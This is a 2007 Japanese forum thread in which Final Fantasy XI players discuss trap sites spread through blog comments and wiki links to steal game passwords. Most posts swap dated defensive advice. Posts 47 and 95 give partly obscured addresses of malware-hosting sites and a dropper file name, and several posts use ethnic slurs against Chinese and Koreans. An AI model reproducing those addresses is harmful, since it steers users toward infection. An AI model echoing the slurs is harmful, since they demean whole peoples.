中国人がFF系ブログに罠サイト張ってパス抜いてる
1 :既にその名前は使われています:2007/10/15(月) 00:36:12.79 ID:a6pLhWfC
なんとかしろ
2 :既にその名前は使われています:2007/10/15(月) 00:37:35.58 ID:VzYiAEpq
お前がなんとかしろ
3 :既にその名前は使われています:2007/10/15(月) 00:37:38.79 ID:jHuhyh+g
被害にあったときどうすれば良いのかテンプレが欲しいです
4 :既にその名前は使われています:2007/10/15(月) 00:39:04.64 ID:w+U2N7f6
中華以下のお前らの知能をまずなんとかしろ
無理か。
5 :既にその名前は使われています:2007/10/15(月) 00:40:05.62 ID:p6xQU04z
お前ら何とかしろ
6 :既にその名前は使われています:2007/10/15(月) 00:41:19.39 ID:ZrPgvY3R
ついに立ったか
いよいよ中華も終わりだな
7 :既にその名前は使われています:2007/10/15(月) 00:41:20.59 ID:/xcUjR/u
俺はいまひげ抜いてる
8 :既にその名前は使われています:2007/10/15(月) 00:42:28.11 ID:4IqcF0At
>>1
doko?
9 :既にその名前は使われています:2007/10/15(月) 00:44:48.93 ID:Bc+bkhyB
なんで公式に数か月も前からでてる情報で
いまさらわざわざスレたてるんだよ( ̄^ ̄)
10 :既にその名前は使われています:2007/10/15(月) 00:45:19.42 ID:AjYAnzkR
獣使い
モンク
11 :既にその名前は使われています:2007/10/15(月) 00:46:22.90 ID:/xcUjR/u
LSメンバー募集中
PCでサイト観覧できる人のみ
こんなLSが一番怪しい
12 :既にその名前は使われています:2007/10/15(月) 00:48:07.24 ID:v9xONA43 BE:578730555-2BP(110)
■グルだろもはや
13 :既にその名前は使われています:2007/10/15(月) 00:50:21.08 ID:PZkFosJZ
泣き寝入りでしょ。
フレが何人か被害あったけど、そのまま引退。
業者はアイテム抜いた後、エクレアは全部捨て。更にご丁寧なことにキャラ上書きまでして復活サービス受けられなくするからな。
ちなみにバハ鯖な。
14 :既にその名前は使われています:2007/10/15(月) 00:52:27.21 ID:T7cNe9Gq
業者はそんなめんどいことしないぞ
時間との勝負だから売りさばいておしまいだ
15 :既にその名前は使われています:2007/10/15(月) 00:54:12.25 ID:TRJ4HJMz
つまりそれは怨恨の線もあるとな
16 :既にその名前は使われています:2007/10/15(月) 00:56:04.51 ID:jHuhyh+g
・PS2やXBOX360で遊ぶ
・FFをプレイするPCでネットサーフィンしない、IDやパスをPC内に残さない
・もしするのであれば最新のウィルス駆除ソフト、スパイウェア駆除ソフトを入れてログインの前に必ずそれらを走らせる
・ウィンドウズアップデートを自動更新にし、常に最新の状態を保つ
・2ch等の掲示板や個人Blogにはられたリンクを気軽に踏まない
・万が一パス抜きをされた場合は運営に報告、サイバーネット課や生活安全課に相談
・・・・・・オワタ('A`)補足があれば頼む
17 :既にその名前は使われています:2007/10/15(月) 00:57:13.04 ID:TRJ4HJMz
>16
「リンクシェルコミュニティを利用しない」も。
18 :既にその名前は使われています:2007/10/15(月) 01:01:54.10 ID:jHuhyh+g
>>17
LSCは自動ログイン設定にしていなければ抜かれることは無いのでは?
公式のを使うなっていうのも乱暴だが確かにリスクはあるんだよね、あれ
19 :既にその名前は使われています:2007/10/15(月) 01:03:28.48 ID:TRJ4HJMz
キーロガーとかあったらだめじゃない?
FFXIですらPOLIDを使わない本人認証をしてるのに
■eって意識それより低いよな・・・
20 :既にその名前は使われています:2007/10/15(月) 01:03:43.02 ID:TRJ4HJMz
すまんFFXIAHな
21 :既にその名前は使われています:2007/10/15(月) 01:05:13.45 ID:jHuhyh+g
>>19
ああ、確かに。
22 :既にその名前は使われています:2007/10/15(月) 01:05:34.60 ID:ZJ2bSwg+
PlayOnlineにIDとパスなんか保存してんな!
最初は面倒かもしれんが一週間もすりゃ完璧覚えてる
もう家が燃えても大丈夫!
23 :既にその名前は使われています:2007/10/15(月) 01:10:42.84 ID:PZkFosJZ
>>14
や、被害逢った複数のフレが全員同じパターンだ。
バハの業者が手が混んでるだけかもしれないがな。
■に連絡しても、アイテムすっからかんの倉庫とエクレアが消えたメイン。もしくは、レベル1キャラに置き換えられたメインしか戻してくれない。
遡ってとか履歴とか辿ってくれっていっても無駄だったそうな。
はじめの被害者が3年前。一番最近でこの夏。でも■の対応は話聞く限り全く変わってないよ。
24 :既にその名前は使われています:2007/10/15(月) 01:15:02.06 ID:m4lmidMG
FFやらなければ解決
25 :既にその名前は使われています:2007/10/15(月) 01:15:09.18 ID:DPnk2hN8
リアルだけでなく、ゲームの中でも
ドロボーしてんのか..支那豚
26 :既にその名前は使われています:2007/10/15(月) 01:15:20.19 ID:s3ed5PEE
つうか、罠サイトでパス抜くのって普通に犯罪じゃね?
27 :既にその名前は使われています:2007/10/15(月) 01:17:08.05 ID:bCnymYVX
>>22
数行上の話を理解出来ていないオマエは何をやっても抜かれるだろうよwww
28 :既にその名前は使われています:2007/10/15(月) 01:18:18.58 ID:jHuhyh+g
・PS2やXBOX360で遊ぶ
・FFをプレイするPCでネットサーフィンしない
・IDやパスをPC内に残さない(キーの入力情報まで読まれることがあります)
・もしするのであれば最新のウィルス駆除ソフト、スパイウェア駆除ソフトを入れてログインの前に必ずそれらを走らせる
(無料のツールならSpybot、Ad-aware、avast! Antivirus等があります)
・ウィンドウズアップデートを自動更新にし、常に最新の状態を保つ
・2ch等の掲示板や個人Blogにはられたリンクを気軽に踏まない
・万が一パス抜きをされた場合は運営に報告、サイバーネット課や生活安全課に相談
こんなとこかな。
あとはパス抜きURLを見つけた時の対処法だ。
誰か頼む('A`)
29 :既にその名前は使われています:2007/10/15(月) 01:19:55.95 ID:AjYAnzkR
>>26
日本国内ならな
30 :既にその名前は使われています:2007/10/15(月) 01:21:41.43 ID:Veyvl1tD
プログタイトル晒せ
31 :既にその名前は使われています:2007/10/15(月) 01:24:02.60 ID:Ky7QMhyq
捕捉
怪しげなアドレスを見つけたら
携帯→PC変換サイトで携帯側からのぞく大抵表示できない(データのみなので)真っ白な画面がでる
そうしたら踏まないこと
32 :既にその名前は使われています:2007/10/15(月) 01:24:49.58 ID:ZrPgvY3R
>>30
自動巡回ツール使ったスパムだよ
他人のブログタイトル偽装した罠サイトが多い
33 :既にその名前は使われています:2007/10/15(月) 01:25:39.83 ID:Ky7QMhyq
追加補足
真っ白な画面以外に標示できない画像になってることもあるらしい
34 :既にその名前は使われています:2007/10/15(月) 01:25:42.91 ID:V85+ACUG
PC版FF11はツーラーとニート廃人にしか売れてないし、さっさと切れよ
アルタナはPS2と箱360だけで発売しろ
PC版なんて全然売れてないだろ、健全に遊んでるプレイヤーに迷惑なんだよ
35 :既にその名前は使われています:2007/10/15(月) 01:25:50.69 ID:ZAd7yvLI
24時間常にログインしてる俺様は平気だな
36 :既にその名前は使われています:2007/10/15(月) 01:28:36.90 ID:MzoKX/Zt
>>35
後からログイン優先だぞ
37 :既にその名前は使われています:2007/10/15(月) 01:41:16.99 ID:2RjVccsB
公式で窓化出来るようになってからがヤバス
38 :既にその名前は使われています:2007/10/15(月) 02:28:07.24 ID:DPnk2hN8
PS2とXboxでやってる人で
被害に合った人はいないの?
39 :既にその名前は使われています:2007/10/15(月) 02:57:02.73 ID:CSfFN5qL
たかがゲーム機でどうやってパスを抜くのか説明してみろ
40 :既にその名前は使われています:2007/10/15(月) 02:59:11.62 ID:oaTC2JAi
今のキーロガーってコピペした内容もわかっちゃう?
41 :既にその名前は使われています:2007/10/15(月) 03:05:31.40 ID:Cd4AQy+k
>>38
■eがパスワードは8桁以上を推奨しているから
PS2、Xboxでも桁数は多い方が良いんじゃない?
42 :既にその名前は使われています:2007/10/15(月) 03:10:13.95 ID:GbtVnJow
某チョンゲだけど、ジョブwikiとかのリンク先が変えられてたりもしたわw
マジで気をつけろよ
43 :既にその名前は使われています:2007/10/15(月) 03:15:24.26 ID:DPnk2hN8
PS3でもネットできるみたいだけど
罠サイト踏んだらパス抜かれたりしない?
PSでネットとか少数だと思うけどw
44 :既にその名前は使われています:2007/10/15(月) 03:15:26.60 ID:82eWdTgD
うん?
知識ないからよくわかんねえんだけど
ブログにはっつけてあるサイトが罠なのか
それともブログそのものが罠なのか
不特定多数が編集できるサイトで
踏むと罠サイトに飛ばされるように
改ざんされてるリンクがあるのか
わけわかんねー
45 :既にその名前は使われています:2007/10/15(月) 03:30:27.50 ID:CSfFN5qL
ドリキャスでネットしてろKASU
46 :age:2007/10/15(月) 03:56:41.78 ID:S4zrR1gv
10-11付けで大量にはられてますね。
注意してください。
ちょっと調べてみたところ、リネ、ROでは既に蔓延しまくってるようで・・・
FFにもついにきたかーという感じでしょうか。
FF公式の日本語文をコピペした文章なのでうっかり踏んでしまう方もおられるかもしれません。
47 :age:2007/10/15(月) 03:58:38.16 ID:S4zrR1gv
ソースファイル、url等でぐぐってみたところ
こんな感じの文章がヒットしたのでコピペします。
以下コピペ
-------------
を踏むと
tp://www■blogplaync■com/king.htm
ここに飛ばされて、ここに仕込んである
chengzhi.exeを踏ませると。
ついでにブラクラみたいに小窓を複数開けて
垢ハックをブラクラと誤認させてる周到さ。
chengzhi.exeに付いてはググって頂戴ね。
king.cur:Win32/TrojanDownloader.Ani.Gen トロイ の亜種
------------------------
カスペ、NOD32等でも検出可能(?)っぽいです。
踏んでしまったらオンラインでスキャンが無難かも(?)
誰か詳しい人フォローして・・・
48 :既にその名前は使われています:2007/10/15(月) 04:00:14.52 ID:AjYAnzkR
>>44
コメント欄
トラックバック
49 :既にその名前は使われています:2007/10/15(月) 04:00:30.50 ID:xi7xrukT
ブログのコメント機能をOFFにしてる俺は勝ち組
どうせ過疎ブログだしもともと誰もコメント書き込まないからね^^v
;;
50 :既にその名前は使われています:2007/10/15(月) 04:05:08.25 ID:PYM+fsfx
PS3でネットしてる奴なんているの?
使い勝手どうなんだろ
51 :age:2007/10/15(月) 04:05:41.19 ID:S4zrR1gv
上記罠サイトコピペ、こんな人は注意したほうがいいらしいです。
■VBscriptが動いちゃう(?) → IE利用者?
■Win32.IMG-ANI.ac → winupdateサボってる人?
ありきたりですが一応・・・
FFでの罠サイト爆撃、今まであまりなかったような気がするので、
誰か対策等まとめて下さるとありがたいです。(他力本願)
それではおやすみなさい。
52 :既にその名前は使われています:2007/10/15(月) 04:06:07.59 ID:HnIOHfEY
>>44
ブログに罠コメントが書かれてる
wikiの外部リンクが罠サイトに改ざんされてる
下手こいたらブログのパスとかも抜かれて罠ブログになってるのもあるんかもね、そこまでやるかは知らんけど。
類似スレ
Wikiが業者に荒らされたら報告・修正するスレ
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1191823980/
[log]
↑のみたいなのを普通に踏んじゃうと罠に行く可能性があるわけよ
53 :既にその名前は使われています:2007/10/15(月) 07:53:30.23 ID:82eWdTgD
なるほどねー
外部リンクに注意か
54 :既にその名前は使われています:2007/10/15(月) 09:07:21.24 ID:mdtLoYw5
日記サイトなんて行かない&ウインなんて使ってない ので問題なし。
世界でもっとも危険なosをわざわざ使う意味が分からない。
55 :既にその名前は使われています:2007/10/15(月) 09:12:04.42 ID:W/MTsceV
流石に箱とPS2は被害無いよね?
今までPCだったが怖くて箱に移行した。
56 :既にその名前は使われています:2007/10/15(月) 09:13:18.78 ID:A6mCAcAM
スキャンでも発見されないとは困るな
57 :既にその名前は使われています:2007/10/15(月) 09:56:30.01 ID:CHaMhoOs
はいはい、罠コメントブログにかかれた挙句、久しぶりのコメントに小躍りして踏んだアホが通りますよ
拡張子は.jpg
慌ててコメント消して回線引っこ抜いたから詳細は分からなくなってしまった・・・
「両手武器は劇的に変わった」
というようなタイトルで、URLを踏むとノートン先生がアクセス拒否を受けていました
こっちはログインパスワードを別PCで変えたりしたけれど、不安だ・・・
58 :既にその名前は使われています:2007/10/15(月) 09:58:37.53 ID:oB/PsuGS
>「両手武器は劇的に変わった」というようなタイトルで
ワロタwwwww
59 :既にその名前は使われています:2007/10/15(月) 10:02:09.21 ID:CHaMhoOs
>>58
両手武器の記事にコメントされていたから笑い事でなく踏んだ人が結構いそうでこわい・・・
60 :既にその名前は使われています:2007/10/15(月) 10:03:47.96 ID:w+U2N7f6
お前らみたいな馬鹿が、リアルで騙される前にゲームで学習できてよかったじゃないか
61 :既にその名前は使われています:2007/10/15(月) 10:14:08.16 ID:rkSOYpl1
>>28
パス抜きする為にはさ、2通りあってなんらかの入力をさせるかjavaなりcgiなりのスクリプトを実行させるか
なんだよね。つまりプレーンなブラウザでwebsite表示させただけじゃクラックなんか
されたりしないんだよ。
もちろんそれなりにセキュリティホールは塞いである前提だけど。
だからまず、インターネットエクスプローラは使わない。
ワンクリで制限解除出来るスレイプニルとかおすすめ。
これで、デフォルトはJava禁止、クッキー禁止、禁止禁止のガッチガチモードに
しておいて、信頼性の高いサイトだけ許可したらいい。
例えば情報サイトでエレメンって有名なトコ、ここ別にjava入れてなくても閲覧
出来るんだよね。
他にもウィンダスとゆかいな仲間たちさんとかもそう。yahooメールだって
古いブラウザとかでもいいようにjavaオフなら古いcgiで動いてたはず、クッキーは
許可しないとダメだけど。そんな訳で
・ブラウザは2ch専ブラ(JaneStyle非IEコンポネ)とタブブラウザ(プニル・フォックス)強く推奨
これ入れて。2chからリンク踏む場合でもJaneStyleなら「ちょっと見ビュワー」機能で
プレーンテキストに抜いてくれる、スクリプトも非実行で文字列としてね。
これなら罠あっても踏まずに済むよ。
62 :既にその名前は使われています:2007/10/15(月) 10:15:25.62 ID:IEvb8sXc
PS2でやればいいじゃん。
63 :既にその名前は使われています:2007/10/15(月) 10:25:50.30 ID:/xcUjR/u
パスがおーっと抜かれた!
さすがみさき君鮮やかなさばきです
ここでみさき君から翼君へロングパスっ!
64 :既にその名前は使われています:2007/10/15(月) 10:43:58.92 ID:ZuWMRxXy
>>61
Sleipnir等のタブブラウザでもエンジンによってはIEの脆弱性を引き継ぐ
Sleipnirのデフォルトは、TridentエンジンなのでIEを使っているようなもんだから注意。
(JavaScriptをJavaと呼んではダメ。言葉は似ているけどまったく違うもの)
65 :既にその名前は使われています:2007/10/15(月) 11:09:57.18 ID:B99C62d9
いまだに
「FF用PCなのでセキュリティソフトとか入れていない^^;」
なんてのが普通に居るくらいだしな・・・。
66 :既にその名前は使われています:2007/10/15(月) 11:21:32.02 ID:33g4XDn0
FFログアウトしなきゃ解決じゃね?
67 :既にその名前は使われています:2007/10/15(月) 11:25:32.78 ID:Gs87ckor
ログインされたら回線おちるよ
68 :既にその名前は使われています:2007/10/15(月) 11:26:59.04 ID:MdVBTL7j
取り敢えず、>>9から>>65に繋いでおく。
本当、ウイルス対策ソフト入れない馬鹿いまだにいるからな。
ここから入れない馬鹿の言い訳(理由)集
69 :既にその名前は使われています:2007/10/15(月) 11:29:25.88 ID:9M7ILir5
対処のテンプレに加えてくれ
・中国を核の炎で焼き尽くす
70 :既にその名前は使われています:2007/10/15(月) 11:32:43.31 ID:Da9yzkEr
セキュリティソフトは入れてるけどスパイウェア対策ソフトは入れてないな
海外製品ばっかで使いづらいってのもあるけど
71 :既にその名前は使われています:2007/10/15(月) 11:34:25.72 ID:/xcUjR/u
対策ソフト入れてても変なサイト足踏み入れりゃ何かしらやられるんだがw
72 :既にその名前は使われています:2007/10/15(月) 11:34:41.58 ID:VgJ3pwSd
ミャンマーと同じでネット封鎖でいいよもう
73 :既にその名前は使われています:2007/10/15(月) 11:35:10.68 ID:XqzSacs8
>>70
SpyBotだかは日本語で操作できるのぜ
74 :既にその名前は使われています:2007/10/15(月) 11:38:38.89 ID:YEH11Y8A
@ウィルスチェックで落とされるのでウィルスバスター切る。
Aいちいちウィルスバスター切るのが面倒になってくる
Bどうせ切るなら最初から入ってなくていいや
現在に至る
75 :既にその名前は使われています:2007/10/15(月) 11:44:04.76 ID:2/MINvwD
うわ…俺週末に踏んだかもしれない。
最近FF再開して、FFって楽しいなぁと再確認した矢先なのに。
76 :既にその名前は使われています:2007/10/15(月) 11:47:09.14 ID:c8PrA3jy
別ゲームでも紹介されていたが
有名なブログと外見が全く同じブログを作ってそこが罠サイトって場合もあるらしい
77 :既にその名前は使われています:2007/10/15(月) 11:49:20.28 ID:CKpc9g6J
>>spybot1.5版は日本語版でインスコしても英語のままになってる部分がいっぱいあるよ
不完全なのかバグなのか知らんけど
免疫化と免疫解除も不完全になっちまうバグ?もあるみたいだし
別の意味でインスコするの危険だ
78 :既にその名前は使われています:2007/10/15(月) 11:49:41.67 ID:uteCZYJK
中国は最悪だなよ
過去自分たちが植民地化されて嫌な思いをしたのに
ミャンマーの軍事政権を後押ししてるんだぜ
どういうことだよ
79 :既にその名前は使われています:2007/10/15(月) 11:52:35.68 ID:s19sNYwT
つーか、FFってパスの情報ベタで持ってんの?w
暗号化もされてないの?
それとも暗号化されてるけど容易に解析されたとか?
抜かれる奴にも責任はあるがバ開発もダメ杉だろ。
80 :既にその名前は使われています:2007/10/15(月) 11:57:29.30 ID:B99C62d9
どうしても金掛けたくねぇって人で、OSがXP/Vistaなら、
ファイアウォール:デフォの(送信は遮断しないらしいので使えないが)
ウィルス対策:Avast!/AVG
スパイ対策:Windows Defender/Ad-Aware(英語)/Spy bot
J-Wordインスコされる安いソフト買うくらいなら、フリーでもいいかもしれん。
81 :既にその名前は使われています:2007/10/15(月) 11:59:42.98 ID:XGJWRhQI
ツールにスパイウェア PCには弊害多すぎる
いかにゲーム機だけのオンラインゲームが安全かわかったな
■よ、次に活かせよ。
82 :既にその名前は使われています:2007/10/15(月) 12:00:28.08 ID:uWYBlKZL
セキュリティ対策で金掛けたくねぇ!って言ってる人には、一度パス抜かれて涙目になってもらったほうがいいんじゃない?
えふえふいれぶん^^;のパスだけならまだしも、将来間違いなくクレカ抜かれるって
83 :既にその名前は使われています:2007/10/15(月) 12:03:13.31 ID:dmNrdvvo
spybot、ウイルス情報が英語なのは勘弁してくれw
84 :既にその名前は使われています:2007/10/15(月) 12:03:21.47 ID:dFX+vFsm
J-WORDはスパイウェアそのものだろ…jk…
85 :既にその名前は使われています:2007/10/15(月) 12:03:49.16 ID:qY7JMJ4h
ん?
POL関係のバージョンアップでパス抜き対策は行われたんじゃないの?
それともバージョンアップでの対応は実は嘘 or 手抜きだったとか?
前はメモリにそのまま入っていたのが、今度は半角スペースで1文字ずつあけて入っているとか?ww
86 :既にその名前は使われています:2007/10/15(月) 12:08:12.39 ID:/xcUjR/u
たとえば罠が仕組まれててもそれ以降パス打つ機会がなければ盗まれないケースもある
ちょくちょくパス変更などで打ってる時に盗まれる場合もあるということだ
87 :既にその名前は使われています:2007/10/15(月) 12:22:37.17 ID:h+I/Zy+I
wikiのリンクいじられてる?
警告でて回線抜いたけどPCネット用の旧式マック使ってたから
被害無さそうだけど。
詳しいひと調査お願いします。
88 :既にその名前は使われています:2007/10/15(月) 12:26:40.77 ID:33g4XDn0
ジョブ別のwikiはもうだめだな
89 :既にその名前は使われています:2007/10/15(月) 12:33:45.24 ID:84dU4gbX
>>17
>「リンクシェルコミュニティを利用しない」も。
リンクシェルコミュニティからパス抜かれる危険ってあるの?
90 :既にその名前は使われています:2007/10/15(月) 12:34:57.16 ID:CHaMhoOs
即回線引っこ抜いて、別PCでパス変えたけれどやっぱり不安だ・・・
91 :既にその名前は使われています:2007/10/15(月) 12:35:59.07 ID:WkeW9cl2
avastっていうフリーのウィルス検知ソフト使ってるんだけどわりといい感じ。
日本語対応してるしね。
92 :既にその名前は使われています:2007/10/15(月) 12:38:32.77 ID:sBZdmUXd
>>89
PassをWebで入力するのが危険っていいたいんだろ。
オンラインスキャンならここもあるっぽ
http://wannabe.fam.cx/service/link.cgi?http://www.kaspersky.co.jp/virusscanner
93 :既にその名前は使われています:2007/10/15(月) 12:40:26.28 ID:84dU4gbX
ああなるほど
94 :既にその名前は使われています:2007/10/15(月) 12:40:32.71 ID:bz8tbAi9
おいおい昨日これ踏んじまったぞ・・・
一応ウイルスバスター2007で引っかかったから削除したけど、どーすりゃいいんだ?
95 :既にその名前は使われています:2007/10/15(月) 12:46:07.64 ID:2/MINvwD
週末に踏んだサイトを携帯でもう一回覗きにいったんだが、↓に飛ばされてた。
tp://www.xiaoriben.net/FFXI/index.htm
なんかおもいっきり中華のサイトなんだがヤバいですか?
96 :既にその名前は使われています:2007/10/15(月) 12:47:33.70 ID:dmNrdvvo
>>95
※このアドレスは危険URLのひとつです。
スキャンお勧め
97 :既にその名前は使われています:2007/10/15(月) 12:49:09.29 ID:8tc1ZXLJ
>>95
つーかそんな露骨にピンインなサイト踏むなww
あと貼るなら頭以外のどっか削れww踏むバカが出て二次被害出るぞww
98 :既にその名前は使われています:2007/10/15(月) 12:51:11.04 ID:I2mbGDHk
>>95
アドレスのxiaoribenって中国語で小日本って意味だなw
笑えるwww
99 :既にその名前は使われています:2007/10/15(月) 12:51:45.29 ID:W/MTsceV
アドレス見ただけで危険だろw
あと>>97の言うとおりもう少し削りなさいw
100 :既にその名前は使われています:2007/10/15(月) 12:53:11.00 ID:pIp+nk4t
Microsoft? Windows? 悪意のあるソフトウェアの削除ツール 最新版
http://wannabe.fam.cx/service/link.cgi?http://www.microsoft.com/downloads/thankyou.aspx?familyId=ad724ae0-e72d-4f54-9ab3-75b8eb148356&displayLang=ja
101 :既にその名前は使われています:2007/10/15(月) 12:56:07.50 ID:2/MINvwD
すいません、焦ってしまいまして。
ちなみにmixiの自分の日記にコメントがあり、URLを短縮できるサイトで別の物に変えられていたのですが、不用意に踏んだのがいけなかった…。
102 :既にその名前は使われています:2007/10/15(月) 12:57:41.57 ID:sBZdmUXd
>>95
フレームでjavascript仕込んでるね
パス抜きとループの2重罠?
危険すぎw
103 :既にその名前は使われています:2007/10/15(月) 12:59:12.01 ID:OpMKEtp1
よく考えたら、スパイウェアでタイピングハックとかされて垢盗まれる可能性もあるんだから
リンクシェルコミュニティに登録とか、ログインするときにスパイウェアあったら完璧にアウトだな。
リンクシェルコミュニティは■eからの罠だなw
パス変える前に裏LSの都合で一度登録したけど、もう二度とログインしねーわw
104 :既にその名前は使われています:2007/10/15(月) 12:59:37.53 ID:8tc1ZXLJ
>>101
とりあえず速攻で駆除して別PCorPS2or箱でFF起動→パス変更
くらいはやっておく方がいいだろうな。
俺も一度mixiで踏んだわ。FFに使ってない方のPCだったけど一応パス変更と駆除はしておいた。
105 :既にその名前は使われています:2007/10/15(月) 13:00:09.08 ID:fWWms7Ms
中華サイトは、シナ系ゲームの公式でさえあんま踏みたくないな
106 :既にその名前は使われています:2007/10/15(月) 13:05:00.10 ID:2/MINvwD
>>104
仕事から帰ったらそうします。アドバイスありがとう。
てか初心者でもあるまいし危機感もつべきだ俺…
107 :既にその名前は使われています:2007/10/15(月) 13:08:18.05 ID:OpMKEtp1
>>106
もう手遅れかもよ?
中華が垢ハックするのに日本人のゴールデンタイムにするわけがないし。
やるとしたら大抵の人が仕事の昼間or寝てる夜中でしょ。
あと>>95をマジでどうにか汁二次被害でるぞ、ネ実は削除依頼あるのかしらんが・・・
108 :既にその名前は使われています:2007/10/15(月) 13:09:36.76 ID:7j7ByKTs
被害者と見せかけて、実は中華の工作員なんだろ('A`)
109 :既にその名前は使われています:2007/10/15(月) 13:10:58.40 ID:sWqjwt+8
またか、俺は毎回パス入力してログインしてるけど。
110 :既にその名前は使われています:2007/10/15(月) 13:12:10.95 ID:YcNLJ2Gn
毎回パス手打ちの方が危なくね?
キー入力そのまま送信なんて罠の方が多そうだが、
つうかPOLのパスワードの保存って暗号化されてるんじゃないの?
その暗号化すら破られている?
111 :既にその名前は使われています:2007/10/15(月) 13:12:53.72 ID:8tc1ZXLJ
>>106
107の言うとおりマジで手遅れかもしれんよ?
もし外回りの仕事だったらネカフェでも行ってパス変更だけでもしてきなさい。
せいぜい10分や20分でできるからちょっと腹の調子が・・・でもごまかせるかもな。
フレでもパスぶっこ抜き金目の物全パクリされたのがいるけど真面目に悲惨だわ。
112 :既にその名前は使われています:2007/10/15(月) 13:14:46.99 ID:/xcUjR/u
>>109みたいに慎重な奴は普段から怪しいサイトさえも踏んでないから安全でいられるだけであって
怪しいサイト踏んでる奴でそれと同じことしたら危ない
113 :既にその名前は使われています:2007/10/15(月) 13:16:01.70 ID:YcNLJ2Gn
>>九十五って、Windowsアップデート最新でアンチウィルスソフト入れててもヤバイ?
つうか、一応不用意にマーカーも打たないようにしとく
114 :既にその名前は使われています:2007/10/15(月) 13:16:15.74 ID:dmNrdvvo
何処かに保存されてるPOLのID、PASSを抜き取るのか、
それとも手打ちのPOLのID、PASSを送信するのか、
どっちなんだろう
誰か教えてくれ
115 :既にその名前は使われています:2007/10/15(月) 13:18:00.80 ID:/xcUjR/u
抜かれないようにしたいならゲーム回線と普通回線別々に引けばいい
116 :既にその名前は使われています:2007/10/15(月) 13:18:06.31 ID:8tc1ZXLJ
FFのログインは暗号化されてない丸裸ってどっかで見た気がする。
つまり■e超矢吹超ノーガード戦法で最強ってこった。
117 :既にその名前は使われています:2007/10/15(月) 13:19:31.36 ID:YcNLJ2Gn
>>114
POLのパスの暗号が既に破られているなら両方、
破られていないなら手打ちじゃね?
俺も暗号が破られているかどうかが凄く気になる
そこまで業者の行動を把握してる奴なんていないかもしれないが・・・
118 :既にその名前は使われています:2007/10/15(月) 13:20:30.82 ID:OpMKEtp1
>>110
どうなのかね?
タイピングハックされてたら毎回パス入力してたとしてもアウト、■eが警告促してるんだから
パスが暗号化されててもそれを解析しちまうんだろう。
一番有効な手段は、ネットサーフィンするPCでFFはやらない。
リンクシェルコミュニティは使わない、パスワードをPCに保存しない。
こんなところか?
スパイウェア駆除ソフトといっても、発見されない新種もあるだろうし
完璧に信用はできねーなぁ。
ここまで心配しなくても怪しいサイトさえ踏まなきゃいいんだろうけどねw
119 :既にその名前は使われています:2007/10/15(月) 13:21:17.20 ID:ifePfyVT
>>1-2
この流れにワロタ
120 :既にその名前は使われています:2007/10/15(月) 13:21:30.99 ID:ysmY2GSW
パスは復号できなくても暗号のままでログインできるから笑える
121 :既にその名前は使われています:2007/10/15(月) 13:21:33.65 ID:YcNLJ2Gn
>>116
平文か!!!
122 :既にその名前は使われています:2007/10/15(月) 13:21:33.78 ID:fWWms7Ms
keyloggerは後者だろうな、WoWでもかなり問題になってる
123 :既にその名前は使われています:2007/10/15(月) 13:25:20.19 ID:YcNLJ2Gn
まあ、罠にかかっても問題ないなんていう環境を作り出すのではなく
罠にかからない環境を作る方が確実って事だな
124 :既にその名前は使われています:2007/10/15(月) 13:26:46.38 ID:ysmY2GSW
_ _ __
〈>´ ` くノ
| i iノノ人)〉
|ilリ、゚ _ ゚ノ| よん?
/|メ」ヽy/メ」.|
( |_ // ノヽ_
\ ̄|つ=|\ |つ
∠\|ムゝ\ \|
ノノ/ / \ \
( ( /__/ >__)
∪/爻 /爻
l_\ l_\
125 :既にその名前は使われています:2007/10/15(月) 13:28:09.25 ID:sWqjwt+8
>>112
確かにFFXIの関連サイトなんてwikiかエレメンくらいしかみてないわ
126 :既にその名前は使われています:2007/10/15(月) 13:28:09.15 ID:sBZdmUXd
>>113
踏んでみた。
アクティブXのアドインのDLさせようとしてくるね
ノートンは危険の警告だしてきたが他はわからん
127 :既にその名前は使われています:2007/10/15(月) 13:31:19.91 ID:dmNrdvvo
>>125
問題はFFのwikiに怪しいページが張られまくってることだなw
128 :既にその名前は使われています:2007/10/15(月) 13:32:50.96 ID:mdOCeo7Z
>>111
ネカフェのPCが一番危ない
129 :既にその名前は使われています:2007/10/15(月) 13:33:57.85 ID:sWqjwt+8
でも普段よくネットするやつなんて、そこが怪しいのか怪しくないのか判断できるよな
130 :既にその名前は使われています:2007/10/15(月) 13:34:24.96 ID:YcNLJ2Gn
他のスレで質問した事だけどやっぱりこっちで質問した方が
良かった気がしてきたから、こっちでも質問させてくれ
ウィルスバスターにパスワードやクレジットカードの番号流出防衛機能ってついていたけど
アレで防衛できるものなのかな・・・
たしか、登録したサイト以外に指定した文字列の送信を出来なくするような機能だったはず
指定する時FFの鯖ってplayonline.comでいいのか・・・
131 :既にその名前は使われています:2007/10/15(月) 13:37:39.14 ID:fWWms7Ms
avast使ってる人のプロバイダ起動数知りたい
webと標準シールド以外で重要なのあるのかね
132 :既にその名前は使われています:2007/10/15(月) 13:38:11.11 ID:9HyDXFD2
こっちのスレも見ておくといい
Wikiが業者に荒らされたら報告・修正するスレ
http://wannabe.fam.cx/service/link.cgi?http://live25.2ch.net/test/read.cgi/ogame/1191823980/
[log]
133 :既にその名前は使われています:2007/10/15(月) 13:43:47.88 ID:8tc1ZXLJ
>>128
キーロガー仕込まれてるってこと?
ネカフェでパス変更→帰宅後再度パス変更でネカフェ部隊がパス回収されても問題ない気がするが。
つかネカフェのPCって毎回初期化って言ってるけどセキュリティどうなってるんだろうな。
134 :既にその名前は使われています:2007/10/15(月) 13:49:29.75 ID:MzoKX/Zt
>>130
普通のWebブラウザでフィッシングサイトに行ったときに、本物の
サイトを間違えて大事な情報を送らないようにする機能だから、
マルウェアからの防衛には期待しないほうがいい。
135 :既にその名前は使われています:2007/10/15(月) 13:50:06.15 ID:HhxXO+0d
最終ラインのノートン先生が何とかしてくれる・・・はず
136 :既にその名前は使われています:2007/10/15(月) 13:51:20.02 ID:ysmY2GSW
アンチウィルスでは防げないよ
137 :既にその名前は使われています:2007/10/15(月) 13:52:22.16 ID:dmNrdvvo
最終ラインがノートン先生は正直微妙だな
138 :既にその名前は使われています:2007/10/15(月) 14:01:28.76 ID:02T/wVMm
ノートン先生のライン統率能力とスピードではシナ業者のスルーパスには
対応できませんな・・・
139 :既にその名前は使われています:2007/10/15(月) 14:05:25.36 ID:2FZ8LNjW
>>39
パケット監視のハードはいくらでもある
140 :既にその名前は使われています:2007/10/15(月) 14:30:46.92 ID:2/MINvwD
>>106です。とりあえず定時までどうにもならないので、手遅れを覚悟して仕事します。
九十五の件も迂濶でした。申し訳ない。
とりあえずどうなったか後で結果報告に来ます。
